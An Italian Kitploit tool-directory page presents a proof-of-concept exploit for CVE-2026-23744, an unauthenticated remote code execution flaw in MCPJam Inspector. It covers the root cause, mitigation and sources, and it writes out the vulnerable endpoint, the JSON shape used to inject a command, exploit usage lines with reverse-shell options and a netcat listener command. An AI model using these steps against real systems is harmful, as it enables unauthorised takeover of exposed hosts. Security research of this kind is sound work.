Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2026-23744 — Exploit proof-of-concept per CVE-2026-23744, una RCE non autenticata in MCPJam Inspector. Fornisce reverse shell ed esecuzione di comandi tramite un endpoint API vulnerabile. | Kitploit
Strumenti/GitHubGitHub/rohit-sundar/cve-2026-23744
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneStrumento di Accesso RemotoLab e Pratica
GitHubrohit-sundar/cve-2026-23744

cve-2026-23744

Exploit proof-of-concept per CVE-2026-23744, una RCE non autenticata in MCPJam Inspector. Fornisce reverse shell ed esecuzione di comandi tramite un endpoint API vulnerabile.

2 mesi faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-23744 – Esecuzione Remota di Codice (RCE) non autenticata in MCPJam Inspector

Descrizione

  • Prodotto: MCPJam Inspector
  • Versioni interessate: ≤ 1.4.2
  • Versione corretta: 1.4.3
  • Tipo: Esecuzione Remota di Codice (RCE) non autenticata
  • Vettore di attacco: Rete
  • Autenticazione richiesta: No
  • Interazione utente richiesta: No
  • CVSS v3.1: 9.8 (Critico)

CVE-2026-23744 è una vulnerabilità critica di Esecuzione Remota di Codice (RCE) non autenticata che interessa MCPJam Inspector ≤ 1.4.2. Il problema deriva dal fatto che Inspector espone un endpoint di gestione (/api/mcp/connect) che accetta configurazioni del server MCP controllate dall'utente e può attivare l'esecuzione di processi senza un'adeguata autenticazione o restrizioni di sicurezza. Le versioni interessate ascoltano su 0.0.0.0 (tutte le interfacce) per impostazione predefinita anziché su localhost, rendendo possibile lo sfruttamento remoto se il servizio è accessibile dalla rete.

Dettagli tecnici

La vulnerabilità è associata al seguente endpoint:

root@kitploit:~
POST /api/mcp/connect

L'endpoint accetta un oggetto JSON contenente una configurazione del server, come:

root@kitploit:~
{
  "serverConfig": {
    "command": "<executable>",
    "args": ["<arguments>"],
    "env": {}
  },
  "serverId": "<identifier>"
}

Questa configurazione fornita viene poi utilizzata da MCPJam Inspector per creare e gestire un nuovo processo MCP server. Poiché all'endpoint mancano controlli di autenticazione e sicurezza sufficienti, un attaccante può inviare definizioni arbitrarie di processi che vengono eseguite dal servizio Inspector.

In sostanza, la vulnerabilità è un problema di Autenticazione Mancante per Funzioni Critiche (CWE-306) in cui l'applicazione espone funzionalità destinate a utenti locali fidati e le rende accessibili attraverso la rete senza adeguati controlli di sicurezza.

Causa principale

La vulnerabilità deriva da due difetti di progettazione:

  1. Accesso non autenticato alla gestione dei processi
  • L'API consente agli utenti di definire come vengono avviati i server MCP.
  • Le funzionalità critiche sono accessibili senza autenticazione.
  • I parametri di processo controllati dall'utente sono considerati affidabili dall'applicazione senza ulteriori verifiche.
  1. Esposizione predefinita non sicura
  • MCPJam Inspector ascolta su 0.0.0.0 per impostazione predefinita.
  • L'API di gestione è raggiungibile da altri sistemi sulla rete.
  • Gli attaccanti possono interagire direttamente da remoto con le funzionalità di creazione dei processi.

Il percorso di attacco risultante può essere visualizzato come segue:

root@kitploit:~
Attacker → /api/mcp/connect → Process Creation → Operating System

Poiché l'applicazione interfaccia direttamente la creazione di processi del sistema operativo, uno sfruttamento riuscito può comportare l'esecuzione arbitraria di comandi nel contesto di sicurezza del servizio MCPJam Inspector.

Utilizzo

root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port>
  • -t (oppure) --target: URL del target o indirizzo IP del target.
  • -tport (oppure) --target-port: Porta del target a cui connettersi; nella maggior parte dei casi è 6274 per MCPJam Inspector. Non utilizzare questo argomento se MCPJam Inspector è ospitato altrove, ad esempio in un sottodominio o in un virtual host. Usa invece l'argomento -t per specificare il sottodominio o il virtual host.
  • -lhost (oppure) --local-host: Indirizzo IP pubblico a cui la reverse shell deve riconnettersi.
  • -lport (oppure) --local-port: Porta da utilizzare per la reverse shell.
root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port> -c '<command>'
  • -c (oppure) --command: Comando da eseguire sul target.

Prima di utilizzare questo programma, devi prima avviare un listener sulla tua macchina locale usando Netcat.

Per farlo, usa il seguente comando:

root@kitploit:~
nc -lvnp <port>

Quindi, esegui il comando precedente per ottenere una reverse shell sul target.

Impatto

Uno sfruttamento riuscito può consentire a un attaccante di:

  • Eseguire comandi arbitrari sull'host target,
  • Leggere o modificare file sensibili,
  • Installare meccanismi di persistenza,
  • Distribuire ulteriore malware o strumenti,
  • Spostarsi lateralmente verso altri sistemi all'interno dell'ambiente,
  • Potenzialmente compromettere completamente il sistema a seconda dei privilegi del servizio.

Alla vulnerabilità è stato assegnato un punteggio CVSS v3.1 di 9.8 (Critico) a causa del vettore di attacco basato sulla rete, della mancanza di autenticazione, dell'assenza di interazione con l'utente e dell'elevato impatto su riservatezza, integrità e disponibilità.

Mitigazione

Aggiorna immediatamente a MCPJam Inspector 1.4.3 o versioni successive. Ulteriori misure difensive includono:

  • Limitare l'accesso all'interfaccia di Inspector,
  • Associare i servizi a localhost ove possibile,
  • Limitare l'esposizione tramite regole firewall,
  • Eseguire il servizio con i privilegi minimi richiesti,
  • Monitorare i tentativi di accesso non autorizzati.

Dichiarazione di non responsabilità

Questo PoC è esclusivamente a scopo educativo, di ricerca difensiva sulla sicurezza e di test di sicurezza autorizzati. Deve essere utilizzato solo contro sistemi con esplicita autorizzazione. L'uso non autorizzato contro sistemi di terze parti può violare leggi e regolamenti applicabili. Il proprietario di questo repository non è responsabile di eventuali danni causati dall'uso di questo programma.

Fonti

  1. MITRE CVE Record – CVE-2026-23744
  2. NIST National Vulnerability Database (NVD) – CVE-2026-23744
  3. GitHub Security Advisory (GHSA-232v-j27c-5pp6)
  4. CVE-2026-23744 – Vulnerability Lookup
  5. CVE-2026-23744: Critical RCE in MCPJam Inspector Targeting Developers – CrowdSec
  6. CVE-2026-23744: MCPJam Inspector RCE Vulnerability – SentinelOne
Scarica lo strumento